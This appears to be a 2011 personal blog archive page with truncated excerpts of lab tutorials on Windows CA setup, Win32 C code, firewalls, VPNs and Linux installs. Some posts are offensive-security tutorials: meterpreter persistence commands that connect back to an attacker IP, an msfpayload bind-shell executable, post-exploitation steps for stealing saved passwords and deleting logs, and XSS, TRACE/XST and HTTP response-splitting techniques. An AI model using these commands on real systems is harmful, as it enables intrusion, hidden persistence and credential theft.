Posts

Showing posts from 2011

Microsoft CA lab

Microsoft Windows CA lab: CA Workgroup: CA Domain: Raise DC: CA: SSL: Network Monitor:

Thanks for reading

All my Lab: Linux Lab -- window and Cisco Lab to be continued - I will update more.

5 steps to create a window with the Windows API in C

5 steps:
1. Initialize class
2. Register class
3. Create window
4. Receive message from WinProc
5. Translate message and dispatch it

Step 1: Initialize class
I like the way http://www.winprog.org/tutorial/simple_window.html does it:

    const char g_szClassName[] = "myWindowClass";

Step 2: Registering the Window Class
In the WinMain() function:

    WNDCLASSEX wc;

    /* Describe the window class before registering it */
    wc.cbSize        = sizeof(WNDCLASSEX);
    wc.style         = 0;
    wc.lpfnWndProc   = WndProc;
    wc.cbClsExtra    = 0;
    wc.cbWndExtra    = 0;
    wc.hInstance     = hInstance;
    wc.hIcon         = LoadIcon(NULL, IDI_APPLICATION);
    wc.hCursor       = LoadCursor(NULL, IDC_ARROW);
    wc.hbrBackground = (HBRUSH)(COLOR_WINDOW+1);
    wc.lpszMenuName  = NULL;
    wc.lpszClassName = g_szClassName;
    wc.hIconSm       = LoadIcon(NULL, IDI_APPLICATION);

    /* Stop if the class cannot be registered */
    if(!RegisterClassEx(&wc))
    {
        MessageBox(NULL, "Window Registration Failed!", "Error!",
            MB_ICONEXCLAMATION | MB_OK);
        return 0;
    }

Step 3: Creating the

Checkpoint Policy

Public http and ftp: Proventia through Checkpoint: Server sensor through checkpoint:

Install Solaris

Thanks to thuynguyenkim for recording and editing the video :))

Checkpoint VPN

VPN client to site: SmartConsole config: Client config and test: VPN site to site: VPN HN: VPN HCM and test:

XSS beef framework

XSS is executed on the client side. You can use JavaScript and the DOM to steal data or cookies, deface pages.... I tried many times with JavaScript, but I found BeEF, an XSS framework. One job: include the script and send malicious code to the victim: If the XSS is in a POST request, you can create a page that will generate the POST request: MF: http://www.mediafire.com/?832ps4haqqg3989

TRACE method with XST

TRACE method. Today, I will present one solution: the TRACE method. We know many HTTP request methods: GET, POST, OPTIONS... But we will focus on one method: TRACE. If we use it, the server gives back a copy of our request:

    icesurfer@nightblade ~ $ nc www.victim.com 80
    TRACE / HTTP/1.1
    Host: www.victim.com

    HTTP/1.1 200 OK
    Server: Microsoft-IIS/5.0
    Date: Tue, 31 Oct 2006 08:01:48 GMT
    Connection: close
    Content-Type: message/http
    Content-Length: 39

    TRACE / HTTP/1.1
    Host: www.victim.com

Now, I am going to talk about HttpOnly. It is a mechanism to protect cookies. HttpOnly is an additional flag included in a Set-Cookie HTTP response header. If the HttpOnly flag (optional) is included in the HTTP response header, the cookie cannot be accessed through client-side script. So, we can use it to prevent XSS attacks. But if the server supports the TRACE method, we can easily bypass it. Now, we must review before the example. The TRACE method will give me the whole request, which means we will access the cookie, which was tagged

HTTP cache poisoning

HTTP response splitting

First, we look at one piece of source code:

    $ cat redir.php
    <?php
    header ("Location: " . $_GET['page']);
    ?>

The "page" argument is taken from the end user and the script redirects (302) to another page. Ex:

    redir.php?page=index.php
    redir.php?page=test.html

Now, we will talk about the HTTP request. Normally, if you request redir.php?page=test.html, the HTTP request looks like this:

    GET http://localhost/redir.php?page=test.html
    Host: localhost
    User-Agent: Mozilla/4.7 [en] (WinNT; I)
    Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */*
    Accept-Encoding: gzip
    Accept-Language: en
    Accept-Charset: iso-8859-1,*,utf-8

We will go to test.html. Notice the "page" variable. It is not filtered, so the end user can modify it. Using CR (%0d) and LF (%0a), an attacker can control the HTTP request and generate two responses to one request. How to do that? This is the page variable: ?page=test.html The resulting answer from the vulnerable application: HT

Install windows 3.1

The first OS I ever used :)).

Metasploit Backdoor Tutorial

Backdoor: Create persistence backdoor
Can be configured to connect back on system boot or user login
Time can be set between connect-back attempts
Under the hood
    Creates a vbs file on the victim and executes it
    Adds registry entries so it is autorun
Can be uninstalled remotely
    Vbs file must be deleted manually

    meterpreter > run persistence
    meterpreter > run persistence -A -U -i 10 -p 3000 -r 192.168.1.10

Metsvc backdoor
Runs as a service on the victim
Connect to it remotely
    No authentication required
Can be remotely uninstalled
    Files need to be deleted manually
Less noisy compared to persistence
    Attacker can connect when he wants
Can be found by port scanning

Demo: Backdoor with Metsvc

Create Executable from payloads
Msfpayload
Use: msfpayload [var=val] [S]ummary|[C]|[P]erl|Rub[y]|[R]aw|[J]avascript|e[X]ecutable|[D]ll|[V]BA|[W]ar;
Ex: msfpayload windows/meterpreter/bind_tcp RHOST=192.168.1.100 X > bind_tcp.exe

Encoding to obfuscate payload
Encode payload to e

Endian - VPN client to site (Host to network)

A friend asked me about it. I notice many companies in Vietnam like using Endian. But for me, I like Vyatta more, because I like denial using routing. :)) It is simple to configure if you have some experience with OpenVPN. Endian uses OpenVPN for its VPN server. And you will notice in the client config, there are:

    dev tap : for DHCP service
    ca endian.pem : CA cert, does not use a client cert like IPCop
    remote endian IP or hostname : of course
    auth-user-pass : user and password which were created.

Demo: or: http://www.mediafire.com/?2qdhttek586be81

Metasploit, stealing data, get saved password and sniffing password

My friend asked me: what will you do after an exploit? So I answered: privilege escalation, or stealing data. I have some advice for: Phases of Post-exploitation
1. Understanding the Victim better
2. Privilege Escalation
3. Deleting Logs and Killing Monitoring software
4. Collecting Data, executing Programs
    Search for a file
    Download files
    Download registry
    Download application data
        Outlook
        Browser password/sessions
        ...etc
5. Backdoors and Rootkits
6. Using the victim as a Pivot to hack deeper into the network

I made a video to demo it: Using Metasploit to steal data and get Firefox saved passwords:

Install l7-filter module for Iptables

Preparing: To use menuconfig:

    yum install -y ncurses-devel

Download required packages

Download L7-filter kernel

    wget http://downloads.sourceforge.net/l7-filter/netfilter-layer7-v2.19.tar.gz

Download L7-filter Protocol definitions

    wget "http://sourceforge.net/projects/l7-filter/files/Protocol%20definitions/2009-05-28/l7-protocols-2009-05-28.tar.gz"

Download Linux Iptables 1.4.0

    wget http://www.netfilter.org/projects/iptables/files/iptables-1.4.0.tar.bz2

Download Linux Kernel 2.6.26

    wget http://www.kernel.org/pub/linux/kernel/v2.6/linux-2.6.26.tar.bz2

Extract it:

    tar xvf linux-2.6.26.tar.bz2
    tar xvf netfilter-layer7-v2.19.tar.gz

Apply patch to Linux kernel source

    cd linux-2.6.26
    patch -p1 < ../netfilter-layer7-v2.19/kernel-2.6.25-layer7-2.19.patch

Apply patch & install iptables 1.4.0

    tar -xvf iptables-1.4.0.tar.bz2
    cd iptables-1.4.0
    patch -p1 < ../netfilter-layer7-v2.19/iptables-1.4-for-kernel-2.6.20forward-layer7-2.19.patch
    chmod +x extensions/.laye

OpenCA tutorial

Install OpenCA tutorial

    # yum install -y openssl-devel db4 db4-devel mysql-server mysql-devel perl-XML-Parser httpd
    # rpm -Uvh openca-tools-1.3.0-1.el5.i386.rpm
    # tar xvf openca-base-1.1.1.tar.gz
    # cd openca-base-1.1.1
    # mysql -u root -p
    Enter password:
    Welcome to the MySQL monitor.  Commands end with ; or \g.
    Your MySQL connection id is 7
    Server version: 5.0.77 Source distribution

    Type 'help;' or '\h' for help. Type '\c' to clear the buffer.

    mysql> create database openca;
    Query OK, 1 row affected (0.00 sec)

    mysql> GRANT ALL PRIVILEGES ON *.* TO 'openca'@'localhost' IDENTIFIED BY '123456';
    Query OK, 0 rows affected (0.00 sec)

    # mysql -u openca -p

    ./configure --prefix=/opt/openca \
                     --with-ca-organization="HBN CA Labs" \
                     --with-httpd-fs-prefix=/var/www \
                     --with-httpd-main-dir=pki \
                     --with-db-name=openca \
                     --with-db

Install Solaris 10 - Tutorial by images

One note: give the VMware VM at least 580 MB of RAM. 539 MB if you install in text mode, 780 if you use graphic mode.

Install Redhat Enterprise - Graphic mode

Many people find it very hard to start learning Linux. In the past, I spent 1 year and still could not install Linux :)). So I wrote a detailed tutorial with images to help anyone who needs it. First, you must have the Redhat ISO. You can burn it to a CD or USB stick. Then, configure the BIOS to boot it. After that, you can start the install.

This is the boot window:
Enter to start (Graphic mode)
If you type text, you will use text mode
Skip to ignore the CD test
Start Graphic mode
Choose Language: English
Choose keyboard: English
Type your serial number: